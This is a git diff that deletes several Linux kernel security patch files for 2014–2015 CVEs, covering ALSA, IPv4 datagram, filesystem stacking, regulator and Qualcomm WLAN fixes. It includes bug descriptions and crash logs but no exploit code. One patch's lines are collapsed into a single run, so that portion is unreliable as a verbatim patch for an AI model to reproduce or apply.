--- a/Patches/Linux_CVEs/CVE-2014-9904/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 6217e5ede23285ddfee10d2e4ba0cc2d4c046205 Mon Sep 17 00:00:00 2001
-From: Dan Carpenter
-Date: Wed, 16 Jul 2014 09:37:04 +0300
-Subject: ALSA: compress: fix an integer overflow check
-
-I previously added an integer overflow check here but looking at it now,
-it's still buggy.
-
-The bug happens in snd_compr_allocate_buffer(). We multiply
-".fragments" and ".fragment_size" and that doesn't overflow but then we
-save it in an unsigned int so it truncates the high bits away and we
-allocate a smaller than expected size.
-
-Fixes: b35cc8225845 ('ALSA: compress_core: integer overflow in snd_compr_allocate_buffer()')
-Signed-off-by: Dan Carpenter
-Signed-off-by: Takashi Iwai
----
- sound/core/compress_offload.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/core/compress_offload.c b/sound/core/compress_offload.c
-index 7403f34..89028fa 100644
---- a/sound/core/compress_offload.c
-+++ b/sound/core/compress_offload.c
-@@ -491,7 +491,7 @@ static int snd_compress_check_input(struct snd_compr_params *params)
- {
- /* first let's check the buffer parameter's */
- if (params->buffer.fragment_size == 0 ||
-- params->buffer.fragments > SIZE_MAX / params->buffer.fragment_size)
-+ params->buffer.fragments > INT_MAX / params->buffer.fragment_size)
- return -EINVAL;
-
- /* now codec parameters */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9914/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9914/ANY/0001.patch
deleted file mode 100644
index a630feea..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9914/ANY/0001.patch
+++ /dev/null
@@ -1,178 +0,0 @@ -From 9709674e68646cee5a24e3000b3558d25412203a Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Tue, 10 Jun 2014 06:43:01 -0700 -Subject: ipv4: fix a race in ip4_datagram_release_cb() - -Alexey gave a AddressSanitizer[1] report that finally gave a good hint -at where was the origin of various problems already reported by Dormando -in the past [2] - -Problem comes from the fact that UDP can have a lockless TX path, and -concurrent threads can manipulate sk_dst_cache, while another thread, -is holding socket lock and calls __sk_dst_set() in -ip4_datagram_release_cb() (this was added in linux-3.8) - -It seems that all we need to do is to use sk_dst_check() and -sk_dst_set() so that all the writers hold same spinlock -(sk->sk_dst_lock) to prevent corruptions. - -TCP stack do not need this protection, as all sk_dst_cache writers hold -the socket lock. - -[1] -https://code.google.com/p/address-sanitizer/wiki/AddressSanitizerForKernel - -AddressSanitizer: heap-use-after-free in ipv4_dst_check -Read of size 2 by thread T15453: - [] ipv4_dst_check+0x1a/0x90 ./net/ipv4/route.c:1116 - [] __sk_dst_check+0x89/0xe0 ./net/core/sock.c:531 - [] ip4_datagram_release_cb+0x46/0x390 ??:0 - [] release_sock+0x17a/0x230 ./net/core/sock.c:2413 - [] ip4_datagram_connect+0x462/0x5d0 ??:0 - [] inet_dgram_connect+0x76/0xd0 ./net/ipv4/af_inet.c:534 - [] SYSC_connect+0x15c/0x1c0 ./net/socket.c:1701 - [] SyS_connect+0xe/0x10 ./net/socket.c:1682 - [] system_call_fastpath+0x16/0x1b -./arch/x86/kernel/entry_64.S:629 - -Freed by thread T15455: - [] dst_destroy+0xa8/0x160 ./net/core/dst.c:251 - [] dst_release+0x45/0x80 ./net/core/dst.c:280 - [] ip4_datagram_connect+0xa1/0x5d0 ??:0 - [] inet_dgram_connect+0x76/0xd0 ./net/ipv4/af_inet.c:534 - [] SYSC_connect+0x15c/0x1c0 ./net/socket.c:1701 - [] SyS_connect+0xe/0x10 ./net/socket.c:1682 - [] system_call_fastpath+0x16/0x1b -./arch/x86/kernel/entry_64.S:629 - -Allocated by thread T15453: - [] dst_alloc+0x81/0x2b0 ./net/core/dst.c:171 - 
[] rt_dst_alloc+0x47/0x50 ./net/ipv4/route.c:1406 - [< inlined >] __ip_route_output_key+0x3e8/0xf70 -__mkroute_output ./net/ipv4/route.c:1939 - [] __ip_route_output_key+0x3e8/0xf70 ./net/ipv4/route.c:2161 - [] ip_route_output_flow+0x14/0x30 ./net/ipv4/route.c:2249 - [] ip4_datagram_connect+0x317/0x5d0 ??:0 - [] inet_dgram_connect+0x76/0xd0 ./net/ipv4/af_inet.c:534 - [] SYSC_connect+0x15c/0x1c0 ./net/socket.c:1701 - [] SyS_connect+0xe/0x10 ./net/socket.c:1682 - [] system_call_fastpath+0x16/0x1b -./arch/x86/kernel/entry_64.S:629 - -[2] -<4>[196727.311203] general protection fault: 0000 [#1] SMP -<4>[196727.311224] Modules linked in: xt_TEE xt_dscp xt_DSCP macvlan bridge coretemp crc32_pclmul ghash_clmulni_intel gpio_ich microcode ipmi_watchdog ipmi_devintf sb_edac edac_core lpc_ich mfd_core tpm_tis tpm tpm_bios ipmi_si ipmi_msghandler isci igb libsas i2c_algo_bit ixgbe ptp pps_core mdio -<4>[196727.311333] CPU: 17 PID: 0 Comm: swapper/17 Not tainted 3.10.26 #1 -<4>[196727.311344] Hardware name: Supermicro X9DRi-LN4+/X9DR3-LN4+/X9DRi-LN4+/X9DR3-LN4+, BIOS 3.0 07/05/2013 -<4>[196727.311364] task: ffff885e6f069700 ti: ffff885e6f072000 task.ti: ffff885e6f072000 -<4>[196727.311377] RIP: 0010:[] [] ipv4_dst_destroy+0x4f/0x80 -<4>[196727.311399] RSP: 0018:ffff885effd23a70 EFLAGS: 00010282 -<4>[196727.311409] RAX: dead000000200200 RBX: ffff8854c398ecc0 RCX: 0000000000000040 -<4>[196727.311423] RDX: dead000000100100 RSI: dead000000100100 RDI: dead000000200200 -<4>[196727.311437] RBP: ffff885effd23a80 R08: ffffffff815fd9e0 R09: ffff885d5a590800 -<4>[196727.311451] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000 -<4>[196727.311464] R13: ffffffff81c8c280 R14: 0000000000000000 R15: ffff880e85ee16ce -<4>[196727.311510] FS: 0000000000000000(0000) GS:ffff885effd20000(0000) knlGS:0000000000000000 -<4>[196727.311554] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 -<4>[196727.311581] CR2: 00007a46751eb000 CR3: 0000005e65688000 CR4: 00000000000407e0 
-<4>[196727.311625] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 -<4>[196727.311669] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 -<4>[196727.311713] Stack: -<4>[196727.311733] ffff8854c398ecc0 ffff8854c398ecc0 ffff885effd23ab0 ffffffff815b7f42 -<4>[196727.311784] ffff88be6595bc00 ffff8854c398ecc0 0000000000000000 ffff8854c398ecc0 -<4>[196727.311834] ffff885effd23ad0 ffffffff815b86c6 ffff885d5a590800 ffff8816827821c0 -<4>[196727.311885] Call Trace: -<4>[196727.311907] -<4>[196727.311912] [] dst_destroy+0x32/0xe0 -<4>[196727.311959] [] dst_release+0x56/0x80 -<4>[196727.311986] [] tcp_v4_do_rcv+0x2a5/0x4a0 -<4>[196727.312013] [] tcp_v4_rcv+0x7da/0x820 -<4>[196727.312041] [] ? ip_rcv_finish+0x360/0x360 -<4>[196727.312070] [] ? nf_hook_slow+0x7d/0x150 -<4>[196727.312097] [] ? ip_rcv_finish+0x360/0x360 -<4>[196727.312125] [] ip_local_deliver_finish+0xb2/0x230 -<4>[196727.312154] [] ip_local_deliver+0x4a/0x90 -<4>[196727.312183] [] ip_rcv_finish+0x119/0x360 -<4>[196727.312212] [] ip_rcv+0x22b/0x340 -<4>[196727.312242] [] ? macvlan_broadcast+0x160/0x160 [macvlan] -<4>[196727.312275] [] __netif_receive_skb_core+0x512/0x640 -<4>[196727.312308] [] ? kmem_cache_alloc+0x13b/0x150 -<4>[196727.312338] [] __netif_receive_skb+0x21/0x70 -<4>[196727.312368] [] netif_receive_skb+0x31/0xa0 -<4>[196727.312397] [] napi_gro_receive+0xe8/0x140 -<4>[196727.312433] [] ixgbe_poll+0x551/0x11f0 [ixgbe] -<4>[196727.312463] [] ? ip_rcv+0x22b/0x340 -<4>[196727.312491] [] net_rx_action+0x111/0x210 -<4>[196727.312521] [] ? 
__netif_receive_skb+0x21/0x70 -<4>[196727.312552] [] __do_softirq+0xd0/0x270 -<4>[196727.312583] [] call_softirq+0x1c/0x30 -<4>[196727.312613] [] do_softirq+0x55/0x90 -<4>[196727.312640] [] irq_exit+0x55/0x60 -<4>[196727.312668] [] do_IRQ+0x63/0xe0 -<4>[196727.312696] [] common_interrupt+0x6a/0x6a -<4>[196727.312722] -<1>[196727.313071] RIP [] ipv4_dst_destroy+0x4f/0x80 -<4>[196727.313100] RSP -<4>[196727.313377] ---[ end trace 64b3f14fae0f2e29 ]--- -<0>[196727.380908] Kernel panic - not syncing: Fatal exception in interrupt - -Reported-by: Alexey Preobrazhensky -Reported-by: dormando -Signed-off-by: Eric Dumazet -Fixes: 8141ed9fcedb2 ("ipv4: Add a socket release callback for datagram sockets") -Cc: Steffen Klassert -Signed-off-by: David S. Miller ---- - net/ipv4/datagram.c | 20 +++++++++++++++----- - 1 file changed, 15 insertions(+), 5 deletions(-) - -diff --git a/net/ipv4/datagram.c b/net/ipv4/datagram.c -index 8b5134c..a3095fd 100644 ---- a/net/ipv4/datagram.c -+++ b/net/ipv4/datagram.c -@@ -86,18 +86,26 @@ out: - } - EXPORT_SYMBOL(ip4_datagram_connect); - -+/* Because UDP xmit path can manipulate sk_dst_cache without holding -+ * socket lock, we need to use sk_dst_set() here, -+ * even if we own the socket lock. -+ */ - void ip4_datagram_release_cb(struct sock *sk) - { - const struct inet_sock *inet = inet_sk(sk); - const struct ip_options_rcu *inet_opt; - __be32 daddr = inet->inet_daddr; -+ struct dst_entry *dst; - struct flowi4 fl4; - struct rtable *rt; - -- if (! 
__sk_dst_get(sk) || __sk_dst_check(sk, 0)) -- return; -- - rcu_read_lock(); -+ -+ dst = __sk_dst_get(sk); -+ if (!dst || !dst->obsolete || dst->ops->check(dst, 0)) { -+ rcu_read_unlock(); -+ return; -+ } - inet_opt = rcu_dereference(inet->inet_opt); - if (inet_opt && inet_opt->opt.srr) - daddr = inet_opt->opt.faddr; -@@ -105,8 +113,10 @@ void ip4_datagram_release_cb(struct sock *sk) - inet->inet_saddr, inet->inet_dport, - inet->inet_sport, sk->sk_protocol, - RT_CONN_FLAGS(sk), sk->sk_bound_dev_if); -- if (!IS_ERR(rt)) -- __sk_dst_set(sk, &rt->dst); -+ -+ dst = !IS_ERR(rt) ? &rt->dst : NULL; -+ sk_dst_set(sk, dst); -+ - rcu_read_unlock(); - } - EXPORT_SYMBOL_GPL(ip4_datagram_release_cb); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9922/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2014-9922/3.10/0002.patch deleted file mode 100644 index d8ba31bc..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9922/3.10/0002.patch +++ /dev/null 
@@ -1,72 +0,0 @@
-From 48a6c91c1d967cc8375621509676a9eabfac5777 Mon Sep 17 00:00:00 2001
-From: Miklos Szeredi
-Date: Fri, 24 Oct 2014 00:14:39 +0200
-Subject: [PATCH] BACKPORT: fs: limit filesystem stacking depth
-
-Add a simple read-only counter to super_block that indicates how deep this
-is in the stack of filesystems. Previously ecryptfs was the only stackable
-filesystem and it explicitly disallowed multiple layers of itself.
-
-Overlayfs, however, can be stacked recursively and also may be stacked
-on top of ecryptfs or vice versa.
-
-To limit the kernel stack usage we must limit the depth of the
-filesystem stack. Initially the limit is set to 2.
-
-Signed-off-by: Miklos Szeredi
-
-(cherry picked from commit 69c433ed2ecd2d3264efd7afec4439524b319121)
-
-Bug: 32761463
-Change-Id: I69b2fba2112db2ece09a1bf61a44f8fc4db00820
----
- fs/ecryptfs/main.c | 7 +++++++
- include/linux/fs.h | 10 ++++++++++
- 2 files changed, 17 insertions(+)
-
-diff --git a/fs/ecryptfs/main.c b/fs/ecryptfs/main.c
-index 329a9cc2b2ebe..8a041bb0753fa 100644
---- a/fs/ecryptfs/main.c
-+++ b/fs/ecryptfs/main.c
-@@ -577,6 +577,13 @@ static struct dentry *ecryptfs_mount(struct file_system_type *fs_type, int flags
- s->s_maxbytes = path.dentry->d_sb->s_maxbytes;
- s->s_blocksize = path.dentry->d_sb->s_blocksize;
- s->s_magic = ECRYPTFS_SUPER_MAGIC;
-+ s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
-+
-+ rc = -EINVAL;
-+ if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+ pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
-+ goto out_free;
-+ }
-
- inode = ecryptfs_get_inode(path.dentry->d_inode, s);
- rc = PTR_ERR(inode);
-diff --git a/include/linux/fs.h b/include/linux/fs.h
-index 1bbd26958874f..0d1e1680f3657 100644
---- a/include/linux/fs.h
-+++ b/include/linux/fs.h
-@@ -244,6 +244,12 @@ struct iattr {
- */
- #include
-
-+/*
-+ * Maximum number of layers of fs stack. 
Needs to be limited to
-+ * prevent kernel stack overflow
-+ */
-+#define FILESYSTEM_MAX_STACK_DEPTH 2
-+
- /**
- * enum positive_aop_returns - aop return codes with specific semantics
- *
-@@ -1331,6 +1337,10 @@ struct super_block {
-
- /* AIO completions deferred from interrupt context */
- struct workqueue_struct *s_dio_done_wq;
-+ /*
-+ * Indicates how deep in a filesystem stack this SB is
-+ */
-+ int s_stack_depth;
- };
-
- /* superblock cache pruning functions */
diff --git a/Patches/Linux_CVEs/CVE-2014-9922/3.10/0003.patch b/Patches/Linux_CVEs/CVE-2014-9922/3.10/0003.patch
deleted file mode 100644
index b745bbd2..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9922/3.10/0003.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 57bc19ec472ab303209b2d96a59a619c5221594d Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Wed, 8 Feb 2017 15:33:48 -0800
-Subject: [PATCH] sdcardfs: limit stacking depth
-
-Limit filesystem stacking to prevent stack overflow.
-
-Bug: 32761463
-Change-Id: I8b1462b9c0d6c7f00cf110724ffb17e7f307c51e
-Signed-off-by: Andrew Chant
----
- fs/sdcardfs/main.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/fs/sdcardfs/main.c b/fs/sdcardfs/main.c
-index a6522286d7314..8b51a124298f4 100755
---- a/fs/sdcardfs/main.c
-+++ b/fs/sdcardfs/main.c
-@@ -223,6 +223,13 @@ static int sdcardfs_read_super(struct super_block *sb, const char *dev_name,
- atomic_inc(&lower_sb->s_active);
- sdcardfs_set_lower_super(sb, lower_sb);
-
-+ sb->s_stack_depth = lower_sb->s_stack_depth + 1;
-+ if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+ pr_err("sdcardfs: maximum fs stacking depth exceeded\n");
-+ err = -EINVAL;
-+ goto out_sput;
-+ }
-+
- /* inherit maxbytes from lower file system */
- sb->s_maxbytes = lower_sb->s_maxbytes;
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9922/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9922/ANY/0001.patch
deleted file mode 100644
index 3d396a88..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9922/ANY/0001.patch
+++ /dev/null
@@ -1,92 +0,0 @@
-From 69c433ed2ecd2d3264efd7afec4439524b319121 Mon Sep 17 00:00:00 2001
-From: Miklos Szeredi
-Date: Fri, 24 Oct 2014 00:14:39 +0200
-Subject: fs: limit filesystem stacking depth
-
-Add a simple read-only counter to super_block that indicates how deep this
-is in the stack of filesystems. Previously ecryptfs was the only stackable
-filesystem and it explicitly disallowed multiple layers of itself.
-
-Overlayfs, however, can be stacked recursively and also may be stacked
-on top of ecryptfs or vice versa.
-
-To limit the kernel stack usage we must limit the depth of the
-filesystem stack. Initially the limit is set to 2.
-
-Signed-off-by: Miklos Szeredi
----
- fs/ecryptfs/main.c | 7 +++++++
- fs/overlayfs/super.c | 9 +++++++++
- include/linux/fs.h | 11 +++++++++++
- 3 files changed, 27 insertions(+)
-
-diff --git a/fs/ecryptfs/main.c b/fs/ecryptfs/main.c
-index 1b119d3..c4cd1fd 100644
---- a/fs/ecryptfs/main.c
-+++ b/fs/ecryptfs/main.c
-@@ -566,6 +566,13 @@ static struct dentry *ecryptfs_mount(struct file_system_type *fs_type, int flags
- s->s_maxbytes = path.dentry->d_sb->s_maxbytes;
- s->s_blocksize = path.dentry->d_sb->s_blocksize;
- s->s_magic = ECRYPTFS_SUPER_MAGIC;
-+ s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
-+
-+ rc = -EINVAL;
-+ if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+ pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
-+ goto out_free;
-+ }
-
- inode = ecryptfs_get_inode(path.dentry->d_inode, s);
- rc = PTR_ERR(inode);
-diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
-index 7dcc24e..08b704c 100644
---- a/fs/overlayfs/super.c
-+++ b/fs/overlayfs/super.c
-@@ -677,6 +677,15 @@ static int ovl_fill_super(struct super_block *sb, void *data, int silent)
- }
- ufs->lower_namelen = statfs.f_namelen;
-
-+ sb->s_stack_depth = max(upperpath.mnt->mnt_sb->s_stack_depth,
-+ lowerpath.mnt->mnt_sb->s_stack_depth) + 1;
-+
-+ err = -EINVAL;
-+ if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+ 
pr_err("overlayfs: maximum fs stacking depth exceeded\n");
-+ goto out_put_workpath;
-+ }
-+
- ufs->upper_mnt = clone_private_mount(&upperpath);
- err = PTR_ERR(ufs->upper_mnt);
- if (IS_ERR(ufs->upper_mnt)) {
-diff --git a/include/linux/fs.h b/include/linux/fs.h
-index 69118b3..4e41a4a 100644
---- a/include/linux/fs.h
-+++ b/include/linux/fs.h
-@@ -261,6 +261,12 @@ struct iattr {
- */
- #include
-
-+/*
-+ * Maximum number of layers of fs stack. Needs to be limited to
-+ * prevent kernel stack overflow
-+ */
-+#define FILESYSTEM_MAX_STACK_DEPTH 2
-+
- /**
- * enum positive_aop_returns - aop return codes with specific semantics
- *
-@@ -1273,6 +1279,11 @@ struct super_block {
- struct list_lru s_dentry_lru ____cacheline_aligned_in_smp;
- struct list_lru s_inode_lru ____cacheline_aligned_in_smp;
- struct rcu_head rcu;
-+
-+ /*
-+ * Indicates how deep in a filesystem stack this SB is
-+ */
-+ int s_stack_depth;
- };
-
- extern struct timespec current_fs_time(struct super_block *sb);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9940/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9940/ANY/0001.patch
deleted file mode 100644
index 1ea5321b..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9940/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 60a2362f769cf549dc466134efe71c8bf9fbaaba Mon Sep 17 00:00:00 2001
-From: Seung-Woo Kim
-Date: Thu, 4 Dec 2014 19:17:17 +0900
-Subject: regulator: core: Fix regualtor_ena_gpio_free not to access pin after
- freeing
-
-After freeing pin from regulator_ena_gpio_free, loop can access
-the pin. So this patch fixes not to access pin after freeing.
-
-Signed-off-by: Seung-Woo Kim
-Signed-off-by: Mark Brown
----
- drivers/regulator/core.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
-index df2af3a..47a455c 100644
---- a/drivers/regulator/core.c
-+++ b/drivers/regulator/core.c
-@@ -1713,6 +1713,8 @@ static void regulator_ena_gpio_free(struct regulator_dev *rdev)
- gpiod_put(pin->gpiod);
- list_del(&pin->list);
- kfree(pin);
-+ rdev->ena_pin = NULL;
-+ return;
- } else {
- pin->request_count--;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0569/prima/0002.patch b/Patches/Linux_CVEs/CVE-2015-0569/prima/0002.patch
deleted file mode 100644
index 940d5f7c..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0569/prima/0002.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 0ffca4f7bca3a8157d8dbaddbcea292c267fb5aa Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar
-Date: Tue, 27 Oct 2015 15:40:18 +0530
-Subject: wlan: Address buffer overflow due to invalid length
-
-Check for valid length before copying the packet filter data from
-userspace buffer to kernel space buffer to avoid buffer overflow
-issue.
-
-Change-Id: I9548727543b903b5eaafa25c6184615d511ca99d
-CRs-Fixed: 930533
----
- CORE/HDD/src/wlan_hdd_wext.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index c38563d..79dde24 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -8401,6 +8401,9 @@ int wlan_hdd_set_filter(hdd_context_t *pHddCtx, tpPacketFilterCfg pRequest,
-
- hddLog(VOS_TRACE_LEVEL_INFO, "Data Offset %d Data Len %d",
- pRequest->paramsData[i].dataOffset, pRequest->paramsData[i].dataLength);
-+ if ((sizeof(packetFilterSetReq.paramsData[i].compareData)) <
-+ (pRequest->paramsData[i].dataLength))
-+ return -EINVAL;
-
- memcpy(&packetFilterSetReq.paramsData[i].compareData,
- pRequest->paramsData[i].compareData, pRequest->paramsData[i].dataLength);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0569/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2015-0569/qcacld-2.0/0001.patch
deleted file mode 100644
index 4eb29650..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0569/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From a079d716b5481223f0166c644e9ec7c75a31b02c Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar
-Date: Tue, 27 Oct 2015 19:25:49 +0530
-Subject: qcacld 2.0: Address buffer overflow due to invalid length
-
-prima to qcacld-2.0 propagation
-
-Check for valid length before copying the packet filter data from
-userspace buffer to kernel space buffer to avoid buffer overflow
-issue.
-
-Change-Id: I9548727543b903b5eaafa25c6184615d511ca99d
-CRs-Fixed: 930533
----
- CORE/HDD/src/wlan_hdd_wext.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 91809f8..668cd1d 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -9741,6 +9741,9 @@ int wlan_hdd_set_filter(hdd_context_t *pHddCtx, tpPacketFilterCfg pRequest,
-
- hddLog(VOS_TRACE_LEVEL_INFO, "Data Offset %d Data Len %d",
- pRequest->paramsData[i].dataOffset, pRequest->paramsData[i].dataLength);
-+ if ((sizeof(packetFilterSetReq.paramsData[i].compareData)) <
-+ (pRequest->paramsData[i].dataLength))
-+ return -EINVAL;
-
- memcpy(&packetFilterSetReq.paramsData[i].compareData,
- pRequest->paramsData[i].compareData, pRequest->paramsData[i].dataLength);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0570/prima/0002.patch b/Patches/Linux_CVEs/CVE-2015-0570/prima/0002.patch
deleted file mode 100644
index dd60cf10..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0570/prima/0002.patch
+++ /dev/null
@@ -1,175 +0,0 @@
-From 606babd474290e84e5a86f94480f62f4a5ff92ac Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar
-Date: Tue, 27 Oct 2015 15:13:46 +0530
-Subject: wlan: Validate ioctls for valid input length
-
-Return failure to applications if ioctl is invoked with arguments
-of improper length.
-
-Change-Id: I01589f37996510ee130485ef43e1f36811692e28
-CRs-Fixed: 930542
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 60 ++++++++++++++++++++++++++++++++---------
- 1 file changed, 47 insertions(+), 13 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index bdee270..dffcc05 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -3958,9 +3958,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- case DOT11F_EID_WPA:
- if (wps_genie[1] < 2 + 4)
- {
-- vos_mem_free(pSap_WPSIe);
-- kfree(fwps_genie);
-- return -EINVAL;
-+ ret = -EINVAL;
-+ goto exit;
- }
- else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0)
- {
-@@ -4018,6 +4017,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT;
- pos += length;
-@@ -4032,9 +4036,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-
- default:
- hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)", (*pos<<8 | *(pos+1)));
-- vos_mem_free(pSap_WPSIe);
-- kfree(fwps_genie);
-- return -EINVAL;
-+ ret = -EINVAL;
-+ goto exit;
- }
- }
- }
-@@ -4046,9 +4049,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-
- default:
- hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]);
-- vos_mem_free(pSap_WPSIe);
-- kfree(fwps_genie);
-- return 0;
-+ ret = -EINVAL;
-+ goto exit;
- }
- }
- else if( wps_genie[0] == 
eQC_WPS_PROBE_RSP_IE)
-@@ -4060,9 +4062,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- case DOT11F_EID_WPA:
- if (wps_genie[1] < 2 + 4)
- {
-- vos_mem_free(pSap_WPSIe);
-- kfree(fwps_genie);
-- return -EINVAL;
-+ ret = -EINVAL;
-+ goto exit;
- }
- else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0)
- {
-@@ -4126,6 +4127,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E)))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT;
- pos += length;
-@@ -4135,6 +4141,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name)))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length;
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT;
-@@ -4145,6 +4156,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text)))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length;
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT;
-@@ -4154,6 +4170,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text)))
-+ {
-+ ret = -EINVAL;
-+ goto 
exit;
-+ }
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length;
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT;
-@@ -4163,6 +4184,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text)))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length;
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT;
-@@ -4186,6 +4212,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
